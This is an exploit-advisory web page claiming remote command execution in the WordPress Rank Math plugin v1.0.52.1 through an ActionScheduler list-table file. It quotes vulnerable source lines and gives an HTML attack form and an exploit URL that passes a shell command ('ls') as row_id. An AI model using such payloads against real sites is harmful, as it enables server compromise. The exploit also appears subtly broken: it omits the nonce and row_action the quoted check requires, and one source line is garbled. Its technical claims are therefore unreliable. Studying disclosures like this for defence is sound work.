Wordpress Plugin Rank Math v1.0.52.1 - Remote Command Execution

2020.11.11

OmideMehraban (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

[-] Title  : Wordpress Plugin Rank Math v1.0.52.1 - Remote Command Execution
[-] Author : OmideMehraban
[-] Vendor : https://wordpress.org/plugins/seo-by-rank-math
[-] Category : Webapps
[-] Date : 2020-11-10

Vulnerable Page:
/ActionScheduler_Abstract_ListTable.php


Vulnerable Source:
  541: $method $method($_REQUEST['row_id']); 
  538: $method = 'row_action_' . $_REQUEST['row_action']; 
     requires:
  540: if($_REQUEST['nonce'] === wp_create_nonce($_REQUEST['row_action'] . '::' . $_REQUEST['row_id']) && method_exists($this, $method))
  530: ⇓ function process_row_actions()

Exploit Code:
<html>
<form action="http://localhost/vendor/woocommerce/action-scheduler/classes/abstracts/ActionScheduler_Abstract_ListTable.php" method="GET">
<input name="row_id" type="text">
<input type="submit" value="RCE!" >
</form>
</html>


Exploit URL:
http://localhost/vendor/woocommerce/action-scheduler/classes/abstracts/ActionScheduler_Abstract_ListTable.php?row_id=ls

********************************************************* 
* Discovered By OmideMehraban
* Instagram: @omidemehraban
* Telegram: @omiid
********************************************************* 

 

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Wordpress Plugin Rank Math v1.0.52.1 - Remote Command Execution

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.